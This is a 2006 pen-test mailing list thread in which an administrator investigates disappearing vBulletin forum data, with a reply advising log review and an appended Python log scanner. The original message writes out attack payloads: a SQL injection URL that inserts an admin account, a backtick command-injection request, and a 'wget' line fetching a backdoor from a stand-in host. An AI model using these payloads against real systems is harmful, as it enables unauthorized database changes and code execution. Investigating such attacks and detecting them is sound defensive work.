Re: testing vulnerable web application.



Dave,

Not to point out something too obvious, but have you checked your web logs? If they are doing SQL injection or other business through the web interface it should all be in there. You should be able to just open up your logs and look for things that are out of the ordinary. Look for direct queries to your page or for possible file inclusion attacks. Next you might want to take a look at the server logs themselves and see if anyone is logging in or logged in at strange times. Make sure your box is not completely compromised or possibly being fiddled with by an insider. You may want to consider completely wiping your vBulletin install and starting fresh with patches and all. Keep your database and all, but double-check it to make sure there really aren't accounts and whatnot that should not be there.

Good luck

Steven


----- Original Message -----
From: "Dave" <fla.tech.talk@xxxxxxxxx>
To: <pen-test@xxxxxxxxxxxxxxxxx>
Sent: Sunday, June 25, 2006 10:41 PM
Subject: testing vulnerable web application.


pen testers,

Our company's website hosts a forum program called vBulletin 3.0.3. A few recent incidents (i.e. threads vanishing, user accounts deleted) have us looking into how this is happening. Our manager wants to solve this problem 'in house', so the task was given to me and another employee to see if we can figure out how this is happening and stop it.

1) We have closely monitored all (co)admin and moderator activities and this has revealed nothing out of the ordinary.

2) We restored the DB content using a backup and within 2 days the threads and accounts in question were gone again.

3) We downloaded and installed a patch from vbulletin.com that was supposed to secure the application but this has not stopped the problem.


We assumed the attacker was using some sort of SQL injection to alter the DB records or possibly he can craft a SQL query in a way that will create an admin account to use to simply log in and alter the records and then delete his username...NO rogue admin accounts have ever been found.

1) We searched the bugtraq lists at securityfocus.com and packetstorm for known SQL vulns for vBulletin

2) We set up a test server to test our theories without damaging the actual DB or interrupting normal business. The options granted to our vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up our test DB with the same permissions etc...


In our search for possible vulns we came across these links:

http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt

When we try to test these POC snippets we don't get results. Examples we have tried:

Using the example admincp/user.php?do=find&orderby=username&limitnumber=[SQL] we crafted a URL:


http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam@xxxxxxxxxx',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]

The syntax for this SQL was obtained from the backup.sql file created by vBulletin. In theory this would create an account with the following values:

userid = 12345
usergroupid = 6
username = admintest
password = 5f376e00eb11f00d0262636a5b699501 (this is the hash of "password")
passworddate = 2006-06-25
email = nospam@xxxxxxxxxx
styleid = 0
usertitle = Administrator
reputation = 10
reputationlevelid = 1
options = 2135
salt = $Nu


Another example we tried:
URL of vuln listing: http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt

Reading this we wondered if the attacker was possibly running a command on the server (such as wget http://foobar.com/backdoor.script) then using this backdoor script he is able to view source code of DB related scripts to obtain info for DB access etc...

We have tried using both the POC code and self-crafted URLs like:
http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo _START_`.`'touch test.txt'`.`echo _END_`."
> then
http://192.168.6.99:8080/vb-forums/test.txt
> 404 error, file not found

This is just a small list of unfruitful examples gathered during a rather exhaustive effort to exploit this application. To date we were not able to successfully exploit the vBulletin application using any of the available POC code snippets. We were hoping that someone out there who is more proficient at this line of work could shed some light on our situation and possibly point us in the right direction.


Thanks in advance for any suggestions.
Dave
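Steven's advice to read the web logs, together with the request shapes Dave lists above (the admincp/user.php limitnumber injection and the forumdisplay.php GLOBALS[] backtick request), as an added example that is not part of this thread: a small Python scanner over constructed Apache access-log lines that flags SQL keywords in the decoded query string, GLOBALS[] parameter overwrites, backtick command substitution and remote or traversal values that look like file inclusion. The sample log lines, the index.php?page= parameter and the three decoding rounds are assumptions for illustration, not vBulletin behaviour.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format lines (not real traffic): lines 2-3 mimic the thread's PoC URLs, line 4 a remote include.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jun/2006:22:41:07 -0400] "GET /vb-forums/forumdisplay.php?f=1 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
10.0.0.9 - - [25/Jun/2006:22:43:19 -0400] "GET /vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=%5BINSERT%20INTO%20user%20VALUES('12345'%2C'6')%5D HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [25/Jun/2006:22:44:02 -0400] "GET /vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=%22.%60touch%20x%60.%22 HTTP/1.1" 200 330 "-" "Mozilla/4.0"
10.0.0.9 - - [25/Jun/2006:22:45:10 -0400] "GET /vb-forums/index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 200 201 "-" "Mozilla/4.0"
10.0.0.12 - - [25/Jun/2006:22:46:00 -0400] "GET /vb-forums/showthread.php?t=42 HTTP/1.1" 200 9001 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+) \S+" \d{3}')
SQLI_RE = re.compile(r"\b(insert\s+into|union\s+(all\s+)?select|update\s+\w+\s+set|delete\s+from|drop\s+table)\b", re.I)

def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so a double-encoded payload does not slip past the checks."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify_request(uri):
    """Return the sorted reasons a request URI looks suspicious (empty list if none)."""
    reasons = set()
    query = urlsplit(uri).query
    if SQLI_RE.search(decode_fully(query)):
        reasons.add("sql-keywords-in-query")
    for name, value in parse_qsl(query, keep_blank_values=True):  # keep GLOBALS[]= even if blank
        name, value = decode_fully(name), decode_fully(value)
        if name.upper().startswith("GLOBALS["):  # superglobal overwrite via register_globals
            reasons.add("globals-overwrite")
        if "`" in value:  # PHP backtick command substitution
            reasons.add("backtick-command-substitution")
        if value.lower().startswith(("http://", "https://", "ftp://")) or "../" in value:
            reasons.add("file-inclusion")
    return sorted(reasons)

def scan_log(text):
    """Parse combined-format lines and return only the suspicious ones with their reasons."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify_request(m["uri"])):
            findings.append({"ip": m["ip"], "ts": m["ts"], "uri": m["uri"], "reasons": reasons})
    return findings
```

Run it against the real access log in place of SAMPLE_LOG and pivot on the source IP and timestamp of each finding to correlate with the times the threads and accounts disappeared.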



------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request@xxxxxxxxxx for details.
------------------------------------------------------------------------------





